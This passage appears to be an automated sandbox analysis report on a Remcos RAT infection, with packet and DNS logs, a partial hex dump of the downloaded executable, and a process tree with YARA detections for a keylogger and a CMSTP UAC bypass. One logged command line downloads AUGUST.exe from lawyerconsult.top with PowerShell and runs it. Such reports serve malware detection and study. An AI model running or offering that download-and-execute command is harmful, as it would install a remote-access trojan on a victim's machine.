Sep 25, 2024 18:33:56.594111919 CEST	49699	80	192.168.2.7	172.94.3.25
Sep 25, 2024 18:33:56.598989010 CEST	80	49699	172.94.3.25	192.168.2.7
Sep 25, 2024 18:33:56.599018097 CEST	80	49699	172.94.3.25	192.168.2.7
Sep 25, 2024 18:33:56.599066973 CEST	80	49699	172.94.3.25	192.168.2.7
Sep 25, 2024 18:33:56.599067926 CEST	49699	80	192.168.2.7	172.94.3.25
Sep 25, 2024 18:33:56.599081993 CEST	80	49699	172.94.3.25	192.168.2.7
Sep 25, 2024 18:33:56.599097967 CEST	80	49699	172.94.3.25	192.168.2.7
Sep 25, 2024 18:33:56.599102974 CEST	49699	80	192.168.2.7	172.94.3.25
Sep 25, 2024 18:33:56.599133015 CEST	49699	80	192.168.2.7	172.94.3.25
Sep 25, 2024 18:33:56.599271059 CEST	80	49699	172.94.3.25	192.168.2.7
Sep 25, 2024 18:33:56.599286079 CEST	80	49699	172.94.3.25	192.168.2.7
Sep 25, 2024 18:33:56.599302053 CEST	80	49699	172.94.3.25	192.168.2.7
Sep 25, 2024 18:33:56.599318027 CEST	80	49699	172.94.3.25	192.168.2.7
Sep 25, 2024 18:33:56.599333048 CEST	80	49699	172.94.3.25	192.168.2.7
Sep 25, 2024 18:33:56.599334002 CEST	49699	80	192.168.2.7	172.94.3.25
Sep 25, 2024 18:33:56.599349022 CEST	80	49699	172.94.3.25	192.168.2.7
Sep 25, 2024 18:33:56.599356890 CEST	49699	80	192.168.2.7	172.94.3.25
Sep 25, 2024 18:33:56.599365950 CEST	80	49699	172.94.3.25	192.168.2.7
Sep 25, 2024 18:33:56.599391937 CEST	49699	80	192.168.2.7	172.94.3.25
Sep 25, 2024 18:33:56.599595070 CEST	80	49699	172.94.3.25	192.168.2.7
Sep 25, 2024 18:33:56.599608898 CEST	80	49699	172.94.3.25	192.168.2.7
Sep 25, 2024 18:33:56.599622965 CEST	80	49699	172.94.3.25	192.168.2.7
Sep 25, 2024 18:33:56.599633932 CEST	49699	80	192.168.2.7	172.94.3.25
Sep 25, 2024 18:33:56.599637032 CEST	80	49699	172.94.3.25	192.168.2.7
Sep 25, 2024 18:33:56.599654913 CEST	80	49699	172.94.3.25	192.168.2.7
Sep 25, 2024 18:33:56.599669933 CEST	80	49699	172.94.3.25	192.168.2.7
Sep 25, 2024 18:33:56.599674940 CEST	49699	80	192.168.2.7	172.94.3.25
Sep 25, 2024 18:33:56.599685907 CEST	80	49699	172.94.3.25	192.168.2.7
Sep 25, 2024 18:33:56.599701881 CEST	80	49699	172.94.3.25	192.168.2.7
Sep 25, 2024 18:33:56.599709988 CEST	49699	80	192.168.2.7	172.94.3.25
Sep 25, 2024 18:33:56.599718094 CEST	80	49699	172.94.3.25	192.168.2.7
Sep 25, 2024 18:33:56.599725008 CEST	49699	80	192.168.2.7	172.94.3.25
Sep 25, 2024 18:33:56.599733114 CEST	80	49699	172.94.3.25	192.168.2.7
Sep 25, 2024 18:33:56.599754095 CEST	49699	80	192.168.2.7	172.94.3.25
Sep 25, 2024 18:33:56.599755049 CEST	80	49699	172.94.3.25	192.168.2.7
Sep 25, 2024 18:33:56.599805117 CEST	49699	80	192.168.2.7	172.94.3.25
Sep 25, 2024 18:33:56.599973917 CEST	80	49699	172.94.3.25	192.168.2.7
Sep 25, 2024 18:33:56.599999905 CEST	80	49699	172.94.3.25	192.168.2.7
Sep 25, 2024 18:33:56.600014925 CEST	80	49699	172.94.3.25	192.168.2.7
Sep 25, 2024 18:33:56.600029945 CEST	49699	80	192.168.2.7	172.94.3.25
Sep 25, 2024 18:33:56.600120068 CEST	80	49699	172.94.3.25	192.168.2.7
Sep 25, 2024 18:33:56.600133896 CEST	80	49699	172.94.3.25	192.168.2.7
Sep 25, 2024 18:33:56.600152016 CEST	80	49699	172.94.3.25	192.168.2.7
Sep 25, 2024 18:33:56.600167036 CEST	80	49699	172.94.3.25	192.168.2.7
Sep 25, 2024 18:33:56.600168943 CEST	49699	80	192.168.2.7	172.94.3.25
Sep 25, 2024 18:33:56.600192070 CEST	49699	80	192.168.2.7	172.94.3.25
Sep 25, 2024 18:33:56.600368023 CEST	80	49699	172.94.3.25	192.168.2.7
Sep 25, 2024 18:33:56.600385904 CEST	80	49699	172.94.3.25	192.168.2.7
Sep 25, 2024 18:33:56.600402117 CEST	80	49699	172.94.3.25	192.168.2.7
Sep 25, 2024 18:33:56.600416899 CEST	80	49699	172.94.3.25	192.168.2.7
Sep 25, 2024 18:33:56.600424051 CEST	49699	80	192.168.2.7	172.94.3.25
Sep 25, 2024 18:33:56.600431919 CEST	80	49699	172.94.3.25	192.168.2.7
Sep 25, 2024 18:33:56.600446939 CEST	80	49699	172.94.3.25	192.168.2.7
Sep 25, 2024 18:33:56.600446939 CEST	49699	80	192.168.2.7	172.94.3.25
Sep 25, 2024 18:33:56.600461960 CEST	80	49699	172.94.3.25	192.168.2.7
Sep 25, 2024 18:33:56.600462914 CEST	49699	80	192.168.2.7	172.94.3.25
Sep 25, 2024 18:33:56.600476027 CEST	80	49699	172.94.3.25	192.168.2.7
Sep 25, 2024 18:33:56.600492001 CEST	80	49699	172.94.3.25	192.168.2.7
Sep 25, 2024 18:33:56.600497007 CEST	49699	80	192.168.2.7	172.94.3.25
Sep 25, 2024 18:33:56.600558043 CEST	80	49699	172.94.3.25	192.168.2.7
Sep 25, 2024 18:33:56.600569963 CEST	49699	80	192.168.2.7	172.94.3.25
Sep 25, 2024 18:33:56.641315937 CEST	49699	80	192.168.2.7	172.94.3.25
Sep 25, 2024 18:33:56.855684996 CEST	49699	80	192.168.2.7	172.94.3.25
Sep 25, 2024 18:33:57.144357920 CEST	49699	80	192.168.2.7	172.94.3.25

UDP Packets

Timestamp	Source Port	Dest Port	Source IP	Dest IP
Sep 25, 2024 18:33:51.591351032 CEST	53239	53	192.168.2.7	1.1.1.1
Sep 25, 2024 18:33:51.602655888 CEST	53	53239	1.1.1.1	192.168.2.7
Sep 25, 2024 18:34:22.619832039 CEST	53	51679	162.159.36.2	192.168.2.7
Sep 25, 2024 18:34:23.119596004 CEST	59750	53	192.168.2.7	1.1.1.1
Sep 25, 2024 18:34:23.132997036 CEST	53	59750	1.1.1.1	192.168.2.7

DNS Queries

Timestamp	Source IP	Dest IP	Trans ID	OP Code	Name	Type	Class	DNS over HTTPS
Sep 25, 2024 18:33:51.591351032 CEST	192.168.2.7	1.1.1.1	0x4914	Standard query (0)	lawyerconsult.top	A (IP address)	IN (0x0001)	false
Sep 25, 2024 18:34:23.119596004 CEST	192.168.2.7	1.1.1.1	0x85ea	Standard query (0)	171.39.242.20.in-addr.arpa	PTR (Pointer record)	IN (0x0001)	false

DNS Answers

Timestamp	Source IP	Dest IP	Trans ID	Reply Code	Name	CName	Address	Type	Class	DNS over HTTPS
Sep 25, 2024 18:33:51.602655888 CEST	1.1.1.1	192.168.2.7	0x4914	No error (0)	lawyerconsult.top		172.94.3.25	A (IP address)	IN (0x0001)	false
Sep 25, 2024 18:34:23.132997036 CEST	1.1.1.1	192.168.2.7	0x85ea	Name error (3)	171.39.242.20.in-addr.arpa	none	none	PTR (Pointer record)	IN (0x0001)	false

HTTP Request Dependency Graph

lawyerconsult.top

HTTP Packets

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
0	192.168.2.7	49699	172.94.3.25	80	3652	C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

Timestamp	Bytes transferred	Direction	Data
Sep 25, 2024 18:33:51.627652884 CEST	172	OUT	GET /AUGUST.exe HTTP/1.1 User-Agent: Mozilla/5.0 (Windows NT; Windows NT 10.0; en-US) WindowsPowerShell/5.1.19041.1682 Host: lawyerconsult.top Connection: Keep-Alive
Sep 25, 2024 18:33:52.250852108 CEST	302	IN	HTTP/1.1 200 OK Content-Length: 4809996 Last-Modified: Wed, 25 Sep 2024 11:52:30 GMT Content-Type: application/x-msdownload Date: Wed, 25 Sep 2024 16:33:52 GMT ETag: "f30293f7a768b837cdb37fc8b138e7a1-1727265150-4809996" Accept-Ranges: bytes Server: WsgiDAV/4.3.3 Cheroot/10.0.1 Python/3.12.2
Sep 25, 2024 18:33:52.250910997 CEST	1236	IN	Data Raw: 4d 5a 60 00 01 00 00 00 04 00 00 00 ff ff 00 00 b8 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 60 00 00 00 0e 1f ba 0e 00 b4 09 cd 21 b8 01 4c cd 21 52 65 71 75 Data Ascii: MZ`@`!L!Require Windows$PEL~&L0@03P
Sep 25, 2024 18:33:52.251187086 CEST	1236	IN	Data Raw: 50 ff 52 1c 83 3d 68 77 41 00 02 8b f0 74 0e 6a 00 ff 35 dc 77 41 00 ff 15 38 32 41 00 8b c6 5e c2 04 00 56 8b f1 33 c0 57 8b 7c 24 0c 89 06 89 46 04 89 46 08 ff 77 04 e8 1a fe ff ff ff 37 ff 36 e8 e1 fd ff ff 8b 47 04 59 59 89 46 04 5f 8b c6 5e Data Ascii: PR=hwAtj5wA82A^V3W\|$FFw76GYYF_^Vff Wt$YWt$6YY~_^VW\|$;t#ff w76rGYYF_^S\$VWy+qN;~0@~+3H
Sep 25, 2024 18:33:52.251240969 CEST	448	IN	Data Raw: 74 1a 83 f8 40 74 07 6a 66 e9 71 ff ff ff 8b 45 dc 89 46 30 8b 45 e0 89 46 34 eb 18 8d 45 b4 50 ff 15 c4 30 41 00 8d 46 30 50 8d 45 b4 50 ff 15 4c 31 41 00 39 7e 38 74 17 ff 33 e8 6c 1b 00 00 85 c0 59 0f 85 3e ff ff ff 6a 68 e9 2f ff ff ff 8b 03 Data Ascii: t@tjfqEF0EF4EP0AF0PEPL1A9~8t3lY>jh/N0QPYY%j;Ytx03AH3PMFFjQHxxP1ASMEEP;Y};ujjVP ujE;Yt
Sep 25, 2024 18:33:52.251602888 CEST	1236	IN	Data Raw: 50 1c ff 75 f0 8b f0 e8 8a 02 01 00 59 8d 4d c4 e8 2c d3 00 00 8b c6 5e 5f 5b c9 c2 10 00 56 6a 00 ff 74 24 0c ff 15 3c 30 41 00 85 c0 75 30 ff 15 50 31 41 00 be b7 00 00 00 3b c6 74 0b 50 ff 15 64 31 41 00 33 c0 5e c3 ff 74 24 08 ff 15 38 30 41 Data Ascii: PuYM,^_[Vjt$<0Au0P1A;tPd1A3^t$80AtuV3@^<uPpA< t<tt<t33@UQEjEEPjEPjEED0AP@0AD$Hfw0HfwWHfw7Vt$
Sep 25, 2024 18:33:52.251645088 CEST	1236	IN	Data Raw: 00 8d 45 f8 50 ff 75 08 ff 15 e8 32 41 00 0f b7 c0 50 68 c8 33 41 00 e8 87 fd ff ff 8b d8 33 f6 83 c4 0c 3b de 0f 84 d9 00 00 00 83 7d f8 10 0f 82 cf 00 00 00 ff 75 f8 6a 40 ff 15 70 30 41 00 ff 75 f8 8b f8 53 57 e8 8e fd 00 00 83 c4 0c 56 ff 15 Data Ascii: EPu2APh3A3;}uj@p0AuSWV3AEPVW3A9uEPhLAVVu2AEPQWl0AE;tfURuPQ9ut?uYMQjPE 0AjuuVVVu2AuVhru2AE
Sep 25, 2024 18:33:52.252248049 CEST	208	IN	Data Raw: 83 ff 40 7e 09 8b c7 99 2b c2 d1 f8 eb 0f 33 c0 83 ff 08 0f 9e c0 48 83 e0 0c 83 c0 04 8d 14 30 3b d3 7d 04 2b de 8b c3 03 f8 57 e8 70 ff ff ff 5f 5e 5b c2 04 00 8b 01 8b 51 04 8b 4c 24 08 2b d1 8d 54 12 02 8d 0c 48 52 51 8b 4c 24 0c 8d 04 48 50 Data Ascii: @~+3H0;}+Wp_^[QL$+THRQL$HP1AT$Vt$BFu^V2<1tA;J\|2^PpA^$u;ut;B\|2S\
Sep 25, 2024 18:33:52.252285004 CEST	1236	IN	Data Raw: 24 10 85 db 56 57 75 04 33 f6 eb 02 8b 33 8b 7c 24 10 eb 18 8b 47 0c 8b 04 b0 ff 74 24 14 8b 00 50 ff 15 98 30 41 00 85 c0 74 0c 46 3b 77 08 7c e3 33 c0 5f 5e 5b c3 85 db 74 02 89 33 8b 47 0c 8b 04 b0 eb ee 56 8b f1 ff 76 0c e8 ce f7 00 00 ff 36 Data Ascii: $VWu33\|$Gt$P0AtF;w\|3_^[t3GVv6YY^t$t$t$t@3U@}u3lwAE@uEEP0At7M3;w.rE;Es$j+PoRYYtlwAlwA3@t$Yu
Sep 25, 2024 18:33:52.252341986 CEST	224	IN	Data Raw: 00 8b 45 e4 3b c3 0f 84 bf 00 00 00 03 f0 8d 85 e0 ef ff ff 33 ff 89 45 f8 38 5d ff 8b c6 74 3d 2b 45 e8 3b f8 77 60 ff 75 e8 ff 75 10 ff 75 f8 e8 27 f3 00 00 83 c4 0c 85 c0 0f 84 87 00 00 00 8b 45 f8 8a 00 3a c3 88 45 e0 74 7f ff 75 e0 8b 4d 14 Data Ascii: E;3E8]t=+E;w`uuu'E:EtuM5GE+E;w#uuuuEEE+}V=]PP1A9]w}"M39Y2_^[UQM&
Sep 25, 2024 18:33:52.252602100 CEST	1236	IN	Data Raw: 00 8a 0f eb 17 80 f9 3d 74 20 ff 75 fc 8b 4d 08 e8 97 fc ff ff ff 06 8b 06 8a 0c 07 8a c1 88 4d fc e8 12 f0 ff ff 84 c0 74 db 8b 45 08 c9 c3 55 8b ec 83 ec 18 83 3d f0 77 41 00 03 75 0c 6a 7a e8 17 f0 ff ff e9 86 00 00 00 56 57 8d 4d e8 e8 c6 fb Data Ascii: =t uMMtEU=wAujzVWMEu<t<tPM7GuhEPEP}_^uu5PpAjj4Mj j&MuuY2YU4VWME0>f
Sep 25, 2024 18:33:52.257424116 CEST	1236	IN	Data Raw: 8b 45 d8 2b 45 d0 53 53 57 ff 75 fc 50 8b 45 d4 2b 45 cc 50 ff 75 d0 ff 75 cc 68 04 08 00 50 68 5c 33 41 00 68 5c 34 41 00 53 ff 15 54 32 41 00 8b f8 3b fb 0f 84 7b ff ff ff 56 ff 15 3c 32 41 00 8b 35 f4 32 41 00 53 6a 22 68 59 04 00 00 57 ff d6 Data Ascii: E+ESSWuPE+EPuuhPh\3Ah\4AST2A;{V<2A52ASj"hYWj2APShCWPEEPEP]uEPhaWuuYYUQSVW=0AjEPuuCPECSuPu>W

Target ID:	1
Start time:	12:33:48
Start date:	25/09/2024
Path:	C:\Windows\System32\cmd.exe
Wow64 process (32bit):	false
Commandline:	"C:\Windows\System32\cmd.exe" /c powershell wget http://lawyerconsult.top/AUGUST.exe -OutFile C:\Users\user\AppData\Roaming/hello.exe && C:\Users\user\AppData\Roaming/hello.exe
Imagebase:	0x7ff7d04d0000
File size:	289'792 bytes
MD5 hash:	8A2122E8162DBEF04694B9C3E0B6CDEE
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Reputation:	high
Has exited:	true

Show Windows behavior

Target ID:	2
Start time:	12:33:48
Start date:	25/09/2024
Path:	C:\Windows\System32\conhost.exe
Wow64 process (32bit):	false
Commandline:	C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Imagebase:	0x7ff75da10000
File size:	862'208 bytes
MD5 hash:	0D698AF330FD17BEE3BF90011D49251D
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Reputation:	high
Has exited:	true

Show Windows behavior

Target ID:	3
Start time:	12:33:48
Start date:	25/09/2024
Path:	C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
Wow64 process (32bit):	false
Commandline:	powershell wget http://lawyerconsult.top/AUGUST.exe -OutFile C:\Users\user\AppData\Roaming/hello.exe
Imagebase:	0x7ff741d30000
File size:	452'608 bytes
MD5 hash:	04029E121A0CFA5991749937DD22A1D9
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Reputation:	high
Has exited:	true

Show Windows behavior

Target ID:	11
Start time:	12:34:00
Start date:	25/09/2024
Path:	C:\Users\user\AppData\Roaming\hello.exe
Wow64 process (32bit):	true
Commandline:	C:\Users\user\AppData\Roaming/hello.exe
Imagebase:	0x400000
File size:	4'809'996 bytes
MD5 hash:	25860926414BF43383246F7C773A8D6C
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Yara matches:	Rule: JoeSecurity_DelphiSystemParamCount, Description: Detected Delphi use of System.ParamCount(), Source: 0000000B.00000003.1378606402.00000000027A7000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
Antivirus matches:	Detection: 3%, ReversingLabs
Reputation:	low
Has exited:	true

Show Windows behavior

Target ID:	12
Start time:	12:34:01
Start date:	25/09/2024
Path:	C:\Users\user\DZIPR.exe
Wow64 process (32bit):	true
Commandline:	"C:\Users\user\DZIPR.exe"
Imagebase:	0x400000
File size:	8'767'704 bytes
MD5 hash:	EC9CE1D67F98072281015C7726FBA245
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Yara matches:	Rule: JoeSecurity_UACBypassusingCMSTP, Description: Yara detected UAC Bypass using CMSTP, Source: 0000000C.00000002.1398577312.0000000003594000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security Rule: JoeSecurity_DelphiSystemParamCount, Description: Detected Delphi use of System.ParamCount(), Source: 0000000C.00000000.1381062753.0000000000401000.00000020.00000001.01000000.00000005.sdmp, Author: Joe Security Rule: JoeSecurity_DelphiSystemParamCount, Description: Detected Delphi use of System.ParamCount(), Source: C:\Users\user\DZIPR.exe, Author: Joe Security
Antivirus matches:	Detection: 0%, ReversingLabs
Reputation:	low
Has exited:	true

Show Windows behavior

Target ID:	13
Start time:	12:34:02
Start date:	25/09/2024
Path:	C:\Users\user\AppData\Roaming\Ruy_driverv2\DZIPR.exe
Wow64 process (32bit):	true
Commandline:	C:\Users\user\AppData\Roaming\Ruy_driverv2\DZIPR.exe
Imagebase:	0x400000
File size:	8'767'704 bytes
MD5 hash:	EC9CE1D67F98072281015C7726FBA245
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Yara matches:	Rule: JoeSecurity_DelphiSystemParamCount, Description: Detected Delphi use of System.ParamCount(), Source: C:\Users\user\AppData\Roaming\Ruy_driverv2\DZIPR.exe, Author: Joe Security
Antivirus matches:	Detection: 0%, ReversingLabs
Reputation:	low
Has exited:	true

Show Windows behavior

Target ID:	14
Start time:	12:34:03
Start date:	25/09/2024
Path:	C:\Windows\SysWOW64\cmd.exe
Wow64 process (32bit):	true
Commandline:	C:\Windows\SysWOW64\cmd.exe
Imagebase:	0x410000
File size:	236'544 bytes
MD5 hash:	D0FCE3AFA6AA1D58CE9FA336CC2B675B
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Yara matches:	Rule: JoeSecurity_UACBypassusingCMSTP, Description: Yara detected UAC Bypass using CMSTP, Source: 0000000E.00000002.1678555697.000000000556D000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security Rule: JoeSecurity_Keylogger_Generic, Description: Yara detected Keylogger Generic, Source: 0000000E.00000002.1679242775.0000000005FF0000.00000004.00001000.00020000.00000000.sdmp, Author: Joe Security Rule: JoeSecurity_Remcos, Description: Yara detected Remcos RAT, Source: 0000000E.00000002.1679242775.0000000005FF0000.00000004.00001000.00020000.00000000.sdmp, Author: Joe Security Rule: JoeSecurity_UACBypassusingCMSTP, Description: Yara detected UAC Bypass using CMSTP, Source: 0000000E.00000002.1679242775.0000000005FF0000.00000004.00001000.00020000.00000000.sdmp, Author: Joe Security Rule: Windows_Trojan_Remcos_b296e965, Description: unknown, Source: 0000000E.00000002.1679242775.0000000005FF0000.00000004.00001000.00020000.00000000.sdmp, Author: unknown
Reputation:	high
Has exited:	true

Show Windows behavior

Target ID:	15
Start time:	12:34:03
Start date:	25/09/2024
Path:	C:\Windows\System32\conhost.exe
Wow64 process (32bit):	false
Commandline:	C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Imagebase:	0x7ff75da10000
File size:	862'208 bytes
MD5 hash:	0D698AF330FD17BEE3BF90011D49251D
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Reputation:	high
Has exited:	true

Show Windows behavior

Target ID:	18
Start time:	14:11:30
Start date:	25/09/2024
Path:	C:\Windows\System32\svchost.exe
Wow64 process (32bit):	false
Commandline:	C:\Windows\System32\svchost.exe -k netsvcs -p -s BITS
Imagebase:	0x7ff7b4ee0000
File size:	55'320 bytes
MD5 hash:	B7F884C1B74A263F746EE12A5F7C9F6A
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Reputation:	high
Has exited:	false

Show Windows behavior

Target ID:	19
Start time:	14:11:39
Start date:	25/09/2024
Path:	C:\Users\user\AppData\Roaming\Ruy_driverv2\DZIPR.exe
Wow64 process (32bit):	true
Commandline:	C:\Users\user\AppData\Roaming\Ruy_driverv2\DZIPR.exe
Imagebase:	0x400000
File size:	8'767'704 bytes
MD5 hash:	EC9CE1D67F98072281015C7726FBA245
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Reputation:	low
Has exited:	true

Show Windows behavior

Target ID:	20
Start time:	14:11:39
Start date:	25/09/2024
Path:	C:\Windows\SysWOW64\cmd.exe
Wow64 process (32bit):	true
Commandline:	C:\Windows\SysWOW64\cmd.exe
Imagebase:	0x410000
File size:	236'544 bytes
MD5 hash:	D0FCE3AFA6AA1D58CE9FA336CC2B675B
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Yara matches:	Rule: JoeSecurity_UACBypassusingCMSTP, Description: Yara detected UAC Bypass using CMSTP, Source: 00000014.00000002.1826635494.0000000004F65000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security Rule: JoeSecurity_Keylogger_Generic, Description: Yara detected Keylogger Generic, Source: 00000014.00000002.1827119501.0000000005500000.00000004.00001000.00020000.00000000.sdmp, Author: Joe Security Rule: JoeSecurity_Remcos, Description: Yara detected Remcos RAT, Source: 00000014.00000002.1827119501.0000000005500000.00000004.00001000.00020000.00000000.sdmp, Author: Joe Security Rule: JoeSecurity_UACBypassusingCMSTP, Description: Yara detected UAC Bypass using CMSTP, Source: 00000014.00000002.1827119501.0000000005500000.00000004.00001000.00020000.00000000.sdmp, Author: Joe Security Rule: Windows_Trojan_Remcos_b296e965, Description: unknown, Source: 00000014.00000002.1827119501.0000000005500000.00000004.00001000.00020000.00000000.sdmp, Author: unknown
Has exited:	true

Show Windows behavior

Target ID:	21
Start time:	14:11:39
Start date:	25/09/2024
Path:	C:\Windows\System32\conhost.exe
Wow64 process (32bit):	false
Commandline:	C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Imagebase:	0x7ff75da10000
File size:	862'208 bytes
MD5 hash:	0D698AF330FD17BEE3BF90011D49251D
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Has exited:	true

Show Windows behavior

Target ID:	22
Start time:	14:11:45
Start date:	25/09/2024
Path:	C:\Windows\SysWOW64\explorer.exe
Wow64 process (32bit):	true
Commandline:	C:\Windows\SysWOW64\explorer.exe
Imagebase:	0xe50000
File size:	4'514'184 bytes
MD5 hash:	DD6597597673F72E10C9DE7901FBA0A8
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Yara matches:	Rule: JoeSecurity_Keylogger_Generic, Description: Yara detected Keylogger Generic, Source: 00000016.00000002.1679023505.00000000004F9000.00000002.00000001.01000000.00000000.sdmp, Author: Joe Security Rule: JoeSecurity_Remcos, Description: Yara detected Remcos RAT, Source: 00000016.00000002.1679023505.00000000004F9000.00000002.00000001.01000000.00000000.sdmp, Author: Joe Security Rule: JoeSecurity_UACBypassusingCMSTP, Description: Yara detected UAC Bypass using CMSTP, Source: 00000016.00000002.1679023505.00000000004F9000.00000002.00000001.01000000.00000000.sdmp, Author: Joe Security Rule: Windows_Trojan_Remcos_b296e965, Description: unknown, Source: 00000016.00000002.1679023505.00000000004F9000.00000002.00000001.01000000.00000000.sdmp, Author: unknown Rule: JoeSecurity_UACBypassusingCMSTP, Description: Yara detected UAC Bypass using CMSTP, Source: 00000016.00000002.1679482200.0000000004A62000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
Has exited:	true

Show Windows behavior

Target ID:	23
Start time:	14:11:58
Start date:	25/09/2024
Path:	C:\Users\user\AppData\Roaming\Ruy_driverv2\DZIPR.exe
Wow64 process (32bit):	true
Commandline:	"C:\Users\user\AppData\Roaming\Ruy_driverv2\DZIPR.exe"
Imagebase:	0x400000
File size:	8'767'704 bytes
MD5 hash:	EC9CE1D67F98072281015C7726FBA245
Has elevated privileges:	false
Has administrator privileges:	false
Programmed in:	C, C++ or other language
Has exited:	true

Show Windows behavior

Target ID:	24
Start time:	14:11:58
Start date:	25/09/2024
Path:	C:\Windows\SysWOW64\cmd.exe
Wow64 process (32bit):	true
Commandline:	C:\Windows\SysWOW64\cmd.exe
Imagebase:	0x410000
File size:	236'544 bytes
MD5 hash:	D0FCE3AFA6AA1D58CE9FA336CC2B675B
Has elevated privileges:	false
Has administrator privileges:	false
Programmed in:	C, C++ or other language
Yara matches:	Rule: JoeSecurity_Keylogger_Generic, Description: Yara detected Keylogger Generic, Source: 00000018.00000002.2009928671.0000000005830000.00000004.00001000.00020000.00000000.sdmp, Author: Joe Security Rule: JoeSecurity_Remcos, Description: Yara detected Remcos RAT, Source: 00000018.00000002.2009928671.0000000005830000.00000004.00001000.00020000.00000000.sdmp, Author: Joe Security Rule: JoeSecurity_UACBypassusingCMSTP, Description: Yara detected UAC Bypass using CMSTP, Source: 00000018.00000002.2009928671.0000000005830000.00000004.00001000.00020000.00000000.sdmp, Author: Joe Security Rule: Windows_Trojan_Remcos_b296e965, Description: unknown, Source: 00000018.00000002.2009928671.0000000005830000.00000004.00001000.00020000.00000000.sdmp, Author: unknown Rule: JoeSecurity_UACBypassusingCMSTP, Description: Yara detected UAC Bypass using CMSTP, Source: 00000018.00000002.2009519386.000000000526E000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
Has exited:	true

Show Windows behavior

Target ID:	25
Start time:	14:11:58
Start date:	25/09/2024
Path:	C:\Windows\System32\conhost.exe
Wow64 process (32bit):	false
Commandline:	C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Imagebase:	0x7ff75da10000
File size:	862'208 bytes
MD5 hash:	0D698AF330FD17BEE3BF90011D49251D
Has elevated privileges:	false
Has administrator privileges:	false
Programmed in:	C, C++ or other language
Has exited:	true

Show Windows behavior

Target ID:	26
Start time:	14:11:59
Start date:	25/09/2024
Path:	C:\Windows\SysWOW64\explorer.exe
Wow64 process (32bit):	true
Commandline:	C:\Windows\SysWOW64\explorer.exe
Imagebase:	0xe50000
File size:	4'514'184 bytes
MD5 hash:	DD6597597673F72E10C9DE7901FBA0A8
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Yara matches:	Rule: Windows_Trojan_Remcos_b296e965, Description: unknown, Source: 0000001A.00000002.1827195478.00000000005CB000.00000004.00000001.01000000.00000000.sdmp, Author: unknown Rule: JoeSecurity_Keylogger_Generic, Description: Yara detected Keylogger Generic, Source: 0000001A.00000002.1827230846.00000000005CF000.00000008.00000001.01000000.00000000.sdmp, Author: Joe Security Rule: JoeSecurity_UACBypassusingCMSTP, Description: Yara detected UAC Bypass using CMSTP, Source: 0000001A.00000002.1827413438.0000000000C7D000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security Rule: JoeSecurity_UACBypassusingCMSTP, Description: Yara detected UAC Bypass using CMSTP, Source: 0000001A.00000002.1827055009.00000000005C2000.00000008.00000001.01000000.00000000.sdmp, Author: Joe Security
Has exited:	true

Show Windows behavior

Target ID:	27
Start time:	14:12:01
Start date:	25/09/2024
Path:	C:\Users\user\AppData\Roaming\Ruy_driverv2\DZIPR.exe
Wow64 process (32bit):	true
Commandline:	C:\Users\user\AppData\Roaming\Ruy_driverv2\DZIPR.exe
Imagebase:	0x400000
File size:	8'767'704 bytes
MD5 hash:	EC9CE1D67F98072281015C7726FBA245
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Has exited:	true

Show Windows behavior

Target ID:	28
Start time:	14:12:01
Start date:	25/09/2024
Path:	C:\Windows\SysWOW64\cmd.exe
Wow64 process (32bit):	true
Commandline:	C:\Windows\SysWOW64\cmd.exe
Imagebase:	0x410000
File size:	236'544 bytes
MD5 hash:	D0FCE3AFA6AA1D58CE9FA336CC2B675B
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Yara matches:	Rule: JoeSecurity_UACBypassusingCMSTP, Description: Yara detected UAC Bypass using CMSTP, Source: 0000001C.00000002.2075325821.0000000005193000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security Rule: JoeSecurity_Keylogger_Generic, Description: Yara detected Keylogger Generic, Source: 0000001C.00000002.2075718056.00000000057D0000.00000004.00001000.00020000.00000000.sdmp, Author: Joe Security Rule: JoeSecurity_Remcos, Description: Yara detected Remcos RAT, Source: 0000001C.00000002.2075718056.00000000057D0000.00000004.00001000.00020000.00000000.sdmp, Author: Joe Security Rule: JoeSecurity_UACBypassusingCMSTP, Description: Yara detected UAC Bypass using CMSTP, Source: 0000001C.00000002.2075718056.00000000057D0000.00000004.00001000.00020000.00000000.sdmp, Author: Joe Security Rule: Windows_Trojan_Remcos_b296e965, Description: unknown, Source: 0000001C.00000002.2075718056.00000000057D0000.00000004.00001000.00020000.00000000.sdmp, Author: unknown
Has exited:	true

Show Windows behavior

Target ID:	29
Start time:	14:12:01
Start date:	25/09/2024
Path:	C:\Windows\System32\conhost.exe
Wow64 process (32bit):	false
